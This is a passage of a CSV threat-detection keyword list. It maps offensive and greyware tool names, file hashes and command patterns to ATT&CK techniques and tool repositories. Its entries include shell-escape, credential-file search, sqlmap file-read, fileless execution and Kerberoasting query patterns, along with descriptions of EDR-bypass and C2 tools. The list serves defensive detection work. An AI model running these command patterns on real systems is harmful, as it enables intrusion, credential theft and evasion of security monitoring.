-*FE4414D9-1D7E-4EEB-B781-D278FE7A5619*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,0,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z
-*FE8F0D23-BDD1-416D-8285-F947BA86D155*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,0,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z 
-*fea01b74-7a60-4142-a54d-7aa8f6471c00*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z
-*fee */* -l pl | perl*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z
-*fee */* -l pl | ruby*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z
-*fee -a *killall sshd* *busybox*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z
-*fee -c */* | ssh *@*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z
-*fee -c */* -w 64 | *,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z
-*feroxbuster -w *fzf-wordlists* -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive 
tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*Fertiliser.exe \\*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z
-*ff_osx_extension-dropper*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*ff3f6b103b45ea48c5fa447854a35950378ce7558868d4975fd5b11202d0a991*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z
-*FFA0FDDE-BE70-49E4-97DE-753304EF1113*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*FFA0FDDE-BE70-49E4-97DE-753304EF1113*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*ffbkglfijbcbgblgflchnbphjdllaogb*,greyware_tool_keyword,CyberGhost VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*ffhhkmlgedgcliajaedapkdfigdobcif*,greyware_tool_keyword,Nucleus VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*ffuf *-input-cmd*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf *-u http*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf -c *,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - 
TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf -fs 185 -c -w *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*ffuf -w *,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf.exe*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf/ffuf*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf_*_freebsd_*.tar.gz*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf_*_linux_*.tar.gz*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf_*_macOS_*.tar.gz*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf_*_openbsd_*.tar.gz*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - 
TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf_*_windows_*.zip*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*ffuf-master.zip*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z
-*fgddmllnllkalaagkghckoinaemmogpe*,greyware_tool_keyword,ExpressVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*fgdump.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*fgexec.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*ficajfeojakddincjafebjmfiefcmanc*,greyware_tool_keyword,Best VPN USA,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*fierce --domain* --dns-servers *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*FiercePhish*,offensive_tool_keyword,FiercePhish,FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns. schedule sending of emails. and much more. The features will continue to be expanded and will include website spoofing. click tracking. and extensive notification options. ,T1566 - T1566.001 - T1566.002 - T1566.003,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Phishing,https://github.com/Raikia/FiercePhish,1,1,N/A,N/A,10,1214,273,2023-05-18T15:38:38Z,2016-12-31T19:41:24Z
-*Fiesta Exploit Kit*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,0,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z
-*File_Smuggler_Http_Handler*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z
-*FileControler/FileControler_x64.dll*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z
-*FileControler/FileControler_x86.dll*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*File-Extensions-Wordlist.txt*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*fileless-elf-exec*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*FilelessPELoader.cpp*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense 
Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*FilelessPELoader.exe*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*FilelessPELoader.vcxproj*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*FilelessPELoader-main*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*FilelessShellcode.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*FilelessShellcode.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*FilelessShellcode.sln*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - 
UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*FilelessShellcode.vcxproj*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*filemsf.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*--file-read=/etc/passwd*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*files/BindShell.exe*,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*files/team-edward.py*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*filezilla2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32*,greyware_tool_keyword,dsquery,Finding users Not Required to Have a Password,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304*,greyware_tool_keyword,dsquery,Finding accounts with Kerberos Pre-Authentication Disabled,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*-filter *(&(objectClass=User)(msDS-AllowedToDelegateTo=*,greyware_tool_keyword,dsquery,Finding accounts with constrained delegation,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*-filter *(&(objectClass=user)(servicePrincipalName=*)(!(cn=krbtgt))(!(samaccounttype=805306369*,greyware_tool_keyword,dsquery,Finding 
Kerberoastable Users,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*-filter *(&(objectClass=User)(serviceprincipalname=*)(samaccountname=* -limit 0 -attr samaccountname serviceprincipalname*,greyware_tool_keyword,dsquery,Finding accounts with SPNs,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*-filter *(userAccountControl:1.2.840.113556.1.4.803:=524288)*,greyware_tool_keyword,dsquery,Finding accounts with unconstrained delegation,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,APT41 - FIN8,Discovery,https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*finalrecon.py --*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*find . -exec /bin/sh \; -quit*,greyware_tool_keyword,find,It can be used to break out from restricted environments by spawning an interactive system shell.,T1059.004 - T1219 - T1027,TA0002 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*find . 
-name spring-beans*.jar*,offensive_tool_keyword,Spring4Shell,Spring4Shell Proof Of Concept/Information CVE-2022-22965,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/BobTheShoplifter/Spring4Shell-POC,1,0,N/A,N/A,4,335,106,2022-11-09T15:46:06Z,2022-03-30T07:54:45Z -*find / * -4000 -type f -print*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*find / * -perm -2000 -type f -print*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*find / * -regextype egrep -iregex*\.kdbx*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*find / -name authorized_keys *> /dev/null*,greyware_tool_keyword,find,Find sensitive files,T1083 - T1213.002 - T1005,TA0007 - TA0010,N/A,N/A,discovery,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*find / -name id_dsa 2>*,greyware_tool_keyword,find,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential 
